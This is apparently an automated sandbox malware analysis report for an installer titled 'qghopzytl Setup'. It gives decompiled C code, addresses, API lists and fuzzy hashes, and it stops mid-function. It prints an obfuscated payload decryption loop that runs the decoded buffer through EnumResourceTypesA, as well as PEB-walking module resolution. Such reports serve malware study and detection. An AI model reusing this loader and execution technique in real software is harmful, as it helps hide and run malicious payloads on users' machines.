              0x00406e3c
              0x00406e43
              0x00406e46
              0x00000000
              0x00406c69
              0x00406be9
              0x00406beb
              0x00406beb
              0x00406bef
              0x00406bf2
              0x00406bf3
              0x00406bf3
              0x00000000
              0x00406beb
              0x00406b5f
              0x00406b65
              0x00000000

              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
              • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
              • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
              • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306754F, Relevance: .2, Instructions: 159COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E7306754F() {
				int _t105;
				void* _t219;

				L0:
				while(1) {
					L0:
					 *(_t219 - 8) =  *(_t219 - 8) + 1;
					L1:
					if( *(_t219 - 8) < 0x1495) {
						L2:
						_t5 = E7306B070 +  *(_t219 - 8); // 0x25000000
						 *(_t219 - 1) =  *_t5;
						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xdc;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000074;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) -  *(_t219 - 8);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000043;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xbc;
						 *(_t219 - 1) =  !( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0xd9;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000008d;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t219 - 1) & 0x000000ff) << 0x00000006;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
						 *(_t219 - 1) =  !( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000021;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) +  *(_t219 - 8);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000f3;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0x14;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t219 - 1) & 0x000000ff) << 0x00000003;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0x96;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000e9;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) +  *(_t219 - 8);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000002b;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xf7;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000001b;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0x82;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000e1;
						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000a0;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0x26;
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t219 - 1) & 0x000000ff) << 0x00000006;
						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
						 *((char*)(E7306B070 +  *(_t219 - 8))) =  *(_t219 - 1);
						continue;
					}
					L3:
					_t105 = EnumResourceTypesA(0, E7306B070, 0); // executed
					L4:
					return _t105;
					L5:
				}
			}





              0x7306754f
              0x7306754f
              0x7306754f
              0x73067555
              0x73067558
              0x7306755f
              0x73067565
              0x73067568
              0x7306756e
              0x73067577
              0x73067581
              0x73067593
              0x730675a0
              0x730675aa
              0x730675b4
              0x730675be
              0x730675d0
              0x730675dd
              0x730675e6
              0x730675ef
              0x730675fc
              0x73067608
              0x7306761b
              0x73067625
              0x7306762e
              0x73067638
              0x7306764a
              0x73067654
              0x73067660
              0x7306766a
              0x7306767d
              0x7306768a
              0x73067697
              0x730676a1
              0x730676ab
              0x730676b8
              0x730676ca
              0x730676d3
              0x730676dd
              0x730676ea
              0x730676f7
              0x73067700
              0x73067712
              0x7306771e
              0x73067728
              0x7306773b
              0x73067745
              0x73067757
              0x73067760
              0x73067769
              0x00000000
              0x73067769
              0x73067774
              0x7306777d
              0x73067783
              0x73067786
              0x00000000
              0x73067786

              APIs
              • EnumResourceTypesA.KERNEL32(00000000,7306B070,00000000), ref: 7306777D
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EnumResourceTypes
              • String ID:
              • API String ID: 29811550-0
              • Opcode ID: 0104347586eb81ebd80e425c7a8a913bb018f06dbf8eb665488a94b4b04efa91
              • Instruction ID: 64cd0d61f800b53e87b85a340afa26da8a867b6beecd9193b28dab93b4120210
              • Opcode Fuzzy Hash: 0104347586eb81ebd80e425c7a8a913bb018f06dbf8eb665488a94b4b04efa91
              • Instruction Fuzzy Hash: A871655484D2E8A9DB16C7FA54603FCBFB15E67102F0885DAE0E166787C47A438FDB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B686, Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
              • Instruction ID: 77b40e24546be5991e32ad4d5dc4ebc6926f0fba48c27b8f897e1deb5cc9a5e6
              • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
              • Instruction Fuzzy Hash: DA11E9B1A00115DFCB10DBABD88896EF7FEEF44A9075440A6F806D3358E774DE41C660
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B776, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
              • Instruction ID: 475d0d843dbda4806821245a36222c01d653f82d0d0fc703a3433a64c940bef6
              • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
              • Instruction Fuzzy Hash: 4EE01A75764609DFCB44CFA9C981E1AB3F8EB59620B144694F916C73A4EB34EE00DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B7B4, Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E7306B7B4(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E7306B686( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}






              0x7306b7c0
              0x7306b7c2
              0x7306b7c5
              0x7306b7c7
              0x7306b7d5
              0x7306b7d9
              0x00000000
              0x00000000
              0x00000000
              0x7306b7db
              0x00000000

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
              • Instruction ID: 0c655716d33eb80d88efd03584be2dbf969be344f9291e2f777674cd29a2c4f7
              • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
              • Instruction Fuzzy Hash: 36E08676310510CFC311DA1AC580A43F3EAFFC89B07194869E846D7714C730FC00C650
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B737, Relevance: .0, Instructions: 7COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E7306B737() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



              0x7306b74a

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "qghopzytl Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































              0x004039b9
              0x004039c2
              0x00403b03
              0x00403b07
              0x00403b0b
              0x00403b0d
              0x00403b12
              0x00403b1d
              0x00403b28
              0x00403b2d
              0x00403b2f
              0x00403b31
              0x00403b34
              0x00403b39
              0x00403b47
              0x00403b54
              0x00403b5b
              0x00403b5b
              0x00403b5c
              0x00403b5c
              0x00403b61
              0x00403b67
              0x00403b6e
              0x00403b74
              0x00403b76
              0x00403bb6
              0x00403bbb
              0x00403bc0
              0x00403bc0
              0x00403bc5
              0x00403bce
              0x00403bd0
              0x00403bd5
              0x00403bdb
              0x00403bdf
              0x00403bdf
              0x00403be4
              0x00403bea
              0x00000000
              0x00000000
              0x00403bf0
              0x00403bf5
              0x00403bfb
              0x00000000
              0x00000000
              0x00403c04
              0x00403c0c
              0x00403c11
              0x00403c14
              0x00403c1a
              0x00403c1f
              0x00403c22
              0x00403c28
              0x00403c2d
              0x00403c30
              0x00403c36
              0x00403c3e
              0x00403c44
              0x00403c4a
              0x00403c4e
              0x00403c55
              0x00403c55
              0x00403c55
              0x00403c5f
              0x00403c71
              0x00403c7d
              0x00403c82
              0x00403c8c
              0x00403c92
              0x00403c94
              0x00403c99
              0x00403c96
              0x00403c96
              0x00403c96
              0x00403ca9
              0x00403cc1
              0x00403cc3
              0x00403cc9
              0x00403cde
              0x00403ccb
              0x00403cd4
              0x00403cd6
              0x00403cd6
              0x00403ce4
              0x00403cf4
              0x00403d05
              0x00403d0c
              0x00403d12
              0x00403d16
              0x00403d1b
              0x00403d1d
              0x00000000
              0x00403d23
              0x00403d23
              0x00403d25
              0x00000000
              0x00000000
              0x00403d2b
              0x00403d2f
              0x00403d54
              0x00403d5a
              0x00403d60
              0x00403d62
              0x00000000
              0x00000000
              0x00403d88
              0x00403d8e
              0x00403d90
              0x00403d95
              0x00000000
              0x00000000
              0x00403d9b
              0x00403d9e
              0x00403da1
              0x00403db8
              0x00403dc4
              0x00403ddd
              0x00403de3
              0x00403de7
              0x00403dec
              0x00403df2
              0x00000000
              0x00000000
              0x00403dfc
              0x00403e07
              0x00000000
              0x00403e07
              0x00403d31
              0x00403d37
              0x00000000
              0x00000000
              0x00403d3d
              0x00403d43
              0x00000000
              0x00000000
              0x00000000
              0x00403d49
              0x00403d1d
              0x00403e14
              0x00403e20
              0x00403e27
              0x00000000
              0x00403b78
              0x00403b78
              0x00403b7b
              0x00403bae
              0x00403bae
              0x00403bb0
              0x00000000
              0x00000000
              0x00000000
              0x00403bb0
              0x00403b7d
              0x00403b81
              0x00403b86
              0x00403b88
              0x00000000
              0x00000000
              0x00403b98
              0x00403ba0
              0x00000000
              0x00403ba6
              0x004039d4
              0x004039d4
              0x004039d8
              0x004039dd
              0x004039ec
              0x004039ec
              0x004039f5
              0x004039fe
              0x00403a09
              0x00403a09
              0x00403a15
              0x00403a31
              0x00403a34
              0x00403a47
              0x00403a4d
              0x00403af0
              0x00000000
              0x00403af9
              0x00403a53
              0x00403a60
              0x00403a62
              0x00403a64
              0x00403a83
              0x00403a83
              0x00403a86
              0x00403a8b
              0x00403a8e
              0x00403a9e
              0x00403a9f
              0x00403aa1
              0x00403ad7
              0x00403aea
              0x00000000
              0x00403aea
              0x00403aa3
              0x00403aa9
              0x00403ac2
              0x00403ac7
              0x00403ac9
              0x00000000
              0x00000000
              0x00403acb
              0x00403ab7
              0x00403ab7
              0x00403ab9
              0x00403ab9
              0x00000000
              0x00403ab9
              0x00403aac
              0x00403ab1
              0x00000000
              0x00403ab1
              0x00403a90
              0x00403a96
              0x00000000
              0x00000000
              0x00403a98
              0x00000000
              0x00403a98
              0x00403a88
              0x00000000
              0x00403a88
              0x00403a6e
              0x00403a75
              0x00403a7b
              0x00403a7d
              0x00000000
              0x00000000
              0x00000000
              0x00403a7d
              0x00403a39
              0x00000000
              0x00403a17
              0x00403a1d
              0x00403a27
              0x00403e2d
              0x00403e33
              0x00403e35
              0x00403e3b
              0x00403e40
              0x00403e46
              0x00403e46
              0x00403e3b
              0x00403e50
              0x00000000
              0x00403e50
              0x00403a15

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
              • ShowWindow.USER32(?), ref: 00403A09
              • DestroyWindow.USER32 ref: 00403A1D
              • SetWindowLongA.USER32 ref: 00403A39
              • GetDlgItem.USER32(?,?), ref: 00403A5A
              • SendMessageA.USER32 ref: 00403A6E
              • IsWindowEnabled.USER32(00000000), ref: 00403A75
              • GetDlgItem.USER32(?,00000001), ref: 00403B23
              • GetDlgItem.USER32(?,00000002), ref: 00403B2D
              • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
              • SendMessageA.USER32 ref: 00403B98
              • GetDlgItem.USER32(?,00000003), ref: 00403C3E
              • ShowWindow.USER32(00000000,?), ref: 00403C5F
              • EnableWindow.USER32(?,?), ref: 00403C71
              • EnableWindow.USER32(?,?), ref: 00403C8C
              • GetSystemMenu.USER32 ref: 00403CA2
              • EnableMenuItem.USER32 ref: 00403CA9
              • SendMessageA.USER32 ref: 00403CC1
              • SendMessageA.USER32 ref: 00403CD4
              • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,qghopzytl Setup), ref: 00403CFD
              • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
              • ShowWindow.USER32(?,0000000A), ref: 00403E40
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: qghopzytl Setup
              • API String ID: 184305955-2370166216
              • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
              • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403FCB, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
